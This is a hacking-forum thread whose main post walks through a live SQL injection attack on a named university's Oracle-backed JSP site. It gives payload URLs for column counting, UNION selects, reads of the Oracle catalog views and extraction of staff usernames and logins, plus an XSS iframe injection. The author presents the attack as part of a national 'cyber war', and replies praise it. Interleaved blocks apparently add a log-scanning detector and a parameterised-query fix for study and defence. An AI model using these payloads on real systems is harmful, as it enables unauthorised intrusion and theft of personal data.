injection on Java Server Pages (jsp) based
  • schumbag
    Posts: 23
    ok, we'll try it
    http://www.mmu.edu.my/

    it's vulnerable
    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436

    like usual, used magic quotes

    https://icems.mmu.edu.my/doe/doe_detail ... 001034436'
    SQL Error - ORA-00933: SQL command not properly ended



    and as we know, the jsp extension uses Oracle for the database application
    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=1--

    No. # Title(Specialization)
    1 Web Programming
    2 Data Mining
    3 C Programming
    4 Java Programming
    5 Web Design
    6 Visual Basic

    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2--


    No. # Title(Specialization)
    No record found!

    --check the number of columns with order by (like the mysql commands)

    https://icems.mmu.edu.my/doe/doe_detail ... 001034436' and 1=1 order by 1--
    still no error?? try again!!

    https://icems.mmu.edu.my/doe/doe_detail ... 001034436' and 1=1 order by 2--

    damn!!! still no error (_ _")

    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=1 order by 3--


    SQL Error - ORA-01785: ORDER BY item must be the number of a SELECT-list expression


    look at that, read it!! if there is an error at the 3rd column, that means only 2 columns are used

    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select 1,2--



    SQL Error - ORA-00923: FROM keyword not found where expected

    yeah, like that

    --use the dual table (a default in oracle)

    https://icems.mmu.edu.my/doe/doe_detail ... 001034436' and 1=2 union all select 1,2 from dual--

    SQL Error - ORA-01790: expression must have same datatype as corresponding expression

    don't be confused, so why use the dual table??
    for references go here...
    http://en.wikipedia.org/wiki/DUAL_table

    right, after that we'll change the numbers to 'null' <= no semicolon used

    https://icems.mmu.edu.my/doe/doe_detail ... 001034436' and 1=2 union all select null,null from dual--
    No. # Title(Specialization) 1 null

    wow, no more error :D
    hey, an XSS bug too!! we'll try that
    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select null, '<iframe width=1000 height=700 src=http://iexploit.org></iframe>' FROM dual--


    but, I'll go to the next step of jsp injection
    but this is different from sql injection using mysql for the database application

    --the oracle version is checked in the banner column of the table v$version
    example :

    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select null,banner FROM v$version--

    No. # Title(Specialization)
    1 Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi
    2 PL/SQL Release 10.2.0.1.0 - Production
    3 CORE 10.2.0.1.0 Production
    4 TNS for Linux: Version 10.2.0.1.0 - Production
    5 NLSRTL Version 10.2.0.1.0 - Production


    see??

    now, we'll check the username with the command:
    user FROM dual--

    like this:

    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select null,user FROM dual--

    and the username is . . . ICEM_WEB

    look at the database :)

    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select null,global_name FROM global_name--


    explore again!!!

    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select null,'database-->' || global_name FROM global_name--


    1 database-->ICEMS.WORLD

    maybe this one is an oracle advantage, it could be neater in appearance and better looking

    if in mysql we use, for combining strings --> concat(str1,str2)

    but in mssql we use --> str1 + str2

    but we try in oracle --> str1 || str2


    end of the intermezzo, now we continue
    let's look at the users in the table all_users, make the command:
    username from all_users--
    example:

    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select null,username from all_users--


    No. # Title(Specialization)
    1 SYS
    2 SYSTEM
    3 OUTLN

    *SKIP => too long
    not important :P but if you want to dump it, it's ok
    maybe we can get CC (lol)


    --look at all tables and users... next, the columns table_name and owner in the table all_tables

    we use the command again like before but modified :)
    and look at the result

    table_owner-->table_name
    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select null,owner || '-->' || table_name from all_tables--



    1 SYS-->DUAL
    2 SYS-->SYSTEM_PRIVILEGE_MAP
    3 SYS-->TABLE_PRIVILEGE_MAP
    4 SYS-->STMT_AUDIT_OPTION_MAP
    5 SYSTEM-->DEF$_TEMP$LOB
    6 WMSYS-->WM$WORKSPACES_TABLE
    7 WMSYS-->WM$VERSION_TABLE

    *SKIP => too long

    458 ICEM_USER-->ICEMS_LOGO
    459 ICEM_USER-->SOSC_PAYMENT
    460 ICEM_USER-->STAFF_PROFILE

    *SKIP AGAIN => too long

    524 SYSTEM-->OL$
    525 SYS-->WRI$_ADV_ASA_RECO_DATA
    526 ICEM_USER-->EXAM_STUD_SCHEDULE_BKP
    527 ICEM_USER-->OAE_QUE


    *EXPLANATION
    the table all_tables is like information_schema.tables in mysql injection,
    it stores the table names (table_name).

    look at this content there

    ICEM_USER-->STAFF_PROFILE

    that makes me curious about the table STAFF_PROFILE

    -look at the columns of the table STAFF_PROFILE --> use all_tab_columns

    this is like information_schema.columns
    and its function is to store column_name

    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select null,column_name from all_tab_columns where table_name='STAFF_PROFILE'--

    look again at the content:

    STAFF_USERNAME, STAFF_NAME and STAFF_LOGIN

    https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select null,STAFF_USERNAME || ' : ' || STAFF_NAME || ' : ' || STAFF_LOGIN from STAFF_PROFILE--

    so, next step you must look for the admin page :)

    *NOTE : maybe you guys will laugh that the web has still not been patched since 2010; I'm attacking because of the cyber war
    between Indonesians vs Malaysians 1 year ago *LOL
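The probes walked through in the post above leave a recognisable trail in the web server's access log: a lone single quote, `order by N--` column counting, `union all select ... from dual`, and reads of the Oracle catalog views v$version, all_users, all_tables, all_tab_columns and global_name. The scanner below is an added example, not code from the thread: it decodes each request's query string and reports which of those indicators appear. The log lines are constructed (the path is the one from the post, the client addresses are documentation ranges), and the combined log format is an assumption.

```python
"""Scan access log lines for the Oracle UNION-injection probes shown in the thread.

Added example, not code from the thread. SAMPLE_LOG is constructed.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qsl, urlsplit

# Constructed combined-format log lines: one clean request, the quote probe,
# the order-by probe, the v$version read, and a second clean client.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2011:13:55:36 +0800] "GET /doe/doe_detail.jsp?id=1001034436 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2011:13:55:40 +0800] "GET /doe/doe_detail.jsp?id=1001034436' HTTP/1.1" 500 612
203.0.113.5 - - [10/Oct/2011:13:56:02 +0800] "GET /doe/doe_detail.jsp?id=1001034436'%20and%201=1%20order%20by%203-- HTTP/1.1" 500 640
203.0.113.5 - - [10/Oct/2011:13:57:11 +0800] "GET /doe/doe_detail.jsp?id=1001034436'%20and%201=2%20union%20all%20select%20null,banner%20FROM%20v$version-- HTTP/1.1" 200 2210
198.51.100.9 - - [10/Oct/2011:13:58:00 +0800] "GET /doe/doe_detail.jsp?id=1001034437 HTTP/1.1" 200 5090
"""

# Pulls method, request target and status code out of a combined-format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Each rule is matched against the URL-decoded, lower-cased parameter value.
RULES = [
    ("order-by column probe", re.compile(r"\border\s+by\s+\d+")),
    ("union select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("oracle catalog view", re.compile(r"\b(v\$version|all_users|all_tables|all_tab_columns|global_name)\b")),
    ("dual pseudo-table", re.compile(r"\bfrom\s+dual\b")),
    ("comment terminator", re.compile(r"--\s*$")),
]


def unbalanced_quote(value: str) -> bool:
    """True for an odd number of single quotes: the lone quote that produced ORA-00933 in the post."""
    return value.count("'") % 2 == 1


def scan_request_target(target: str) -> list[str]:
    """Return the names of every indicator found in the target's query-string values."""
    parsed = urlsplit(target)
    findings: list[str] = []
    # parse_qsl already URL-decodes (%20 -> space), so the rules see plain SQL text.
    for _name, value in parse_qsl(parsed.query, keep_blank_values=True):
        value = value.lower()
        if unbalanced_quote(value):
            findings.append("unbalanced quote")
        for rule_name, pattern in RULES:
            if pattern.search(value):
                findings.append(rule_name)
    return findings


def scan_log(log_text: str) -> list[dict]:
    """Parse each line and keep only the requests that carry at least one indicator."""
    alerts = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = scan_request_target(match.group("target"))
        if findings:
            status = int(match.group("status"))
            alerts.append({
                "client": line.split(" ", 1)[0],
                "target": match.group("target"),
                "status": status,
                # A 5xx on tainted input suggests the raw DB error reached the client.
                "db_error_suspected": status >= 500,
                "findings": findings,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['client']} {alert['status']} {alert['findings']}")
        print(f"    {alert['target']}")
```

The `db_error_suspected` flag is worth keeping in the alert: in the thread the ORA-xxxx text was echoed straight to the browser, which is what made the column count and data types so easy to read off. Catching `SQLException` in the JSP and returning a generic error page removes that feedback, and the parameterised query removes the injection itself.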
  • Sh3llc0d3
    Posts: 1,910
    Nice tutorial, interesting seeing .jsp extension being used.
  • Xin
    Posts: 3,251
    Really good tutorial nice to see a working example
    Xin
  • archit
    Posts: 1
    here is my code
    // account_id comes straight from the request and is spliced into the SQL text
    String query = "select username,salary,account_no from data where account_no='" + account_id + "' ";
    rs = stmt.executeQuery(query);

    // print the matching rows (only the first two selected columns are shown)
    while (rs.next())
    {
        out1.println("your account information");
        out1.println(rs.getString(1));
        out1.println(rs.getString(2));
    }

    as per your method I am still not getting success in sql injection
    "and 1=1 order by 3-- " is not working and everything displays properly
    ya, when I put http://localhost:8080/WebApplication6/display.jsp?search_box=1000 I get normal output
    instead of 1000, if I use 'or'1=1 it displays all, no problem, but when I use search_box=1000' it gives an error, which it should give, but still when I use the order by query it displays nothing. I have 4 columns in my table, so what should I code so I can do sql injection in it?
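To see why the string concatenation in the snippet above is injectable and what a bound parameter changes, here is the same query rebuilt on Python's sqlite3 so it runs offline. This is an added example, not archit's code: the `data` table and its rows are constructed, and using sqlite rather than Oracle or MySQL is an assumption, so the error text differs from the ORA- messages in the thread even though the behaviour is the same.

```python
"""Concatenated vs. parameterised lookup, mirroring the posted JSP query.

Added example, not the poster's code. Table and rows are constructed.
"""
from __future__ import annotations

import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory table shaped like the one in the post, with constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("create table data (username text, salary integer, account_no text)")
    con.executemany(
        "insert into data values (?, ?, ?)",
        [("alice", 5200, "1000"), ("bob", 4100, "1001"), ("carol", 6300, "1002")],
    )
    return con


def lookup_concatenated(con: sqlite3.Connection, account_id: str) -> list[tuple]:
    """Mirrors the posted Java: untrusted input is spliced into the SQL text."""
    query = "select username,salary,account_no from data where account_no='" + account_id + "' "
    return con.execute(query).fetchall()


def lookup_parameterised(con: sqlite3.Connection, account_id: str) -> list[tuple]:
    """Same query with a bound parameter: the input is only ever a value, never SQL."""
    query = "select username,salary,account_no from data where account_no=?"
    return con.execute(query, (account_id,)).fetchall()


def compare(account_id: str) -> dict:
    """Run both forms on one input; a DB error from the concatenated form is reported as text."""
    con = make_db()
    result: dict = {"input": account_id}
    try:
        result["concatenated"] = lookup_concatenated(con, account_id)
    except sqlite3.Error as exc:
        # The equivalent of the ORA-xxxx text the site in the thread echoed back.
        result["concatenated"] = f"SQL error: {exc}"
    result["parameterised"] = lookup_parameterised(con, account_id)
    return result


if __name__ == "__main__":
    for probe in [
        "1000",                                      # normal request
        "1000'",                                     # lone quote: syntax error
        "1000' or '1'='1",                           # tautology: every row
        "1000' order by 4--",                        # column-count probe past the last column
        "1000' union all select null,null,null--",   # UNION with the right column count
    ]:
        r = compare(probe)
        print(f"{probe!r:45} concatenated={r['concatenated']!r}")
        print(f"{'':45} parameterised={r['parameterised']!r}")
```

Run it and the concatenated column shows exactly the pattern in the thread: a syntax error for the lone quote, an out-of-range error for `order by 4` where the table has three columns, and extra rows for the tautology and the UNION. The parameterised column returns the one matching row for `1000` and an empty result for everything else, because the whole probe is compared as a literal account number. In the Java of the snippet the same fix is a `PreparedStatement` with `?` placeholders and `setString`, in place of building the query with `+`.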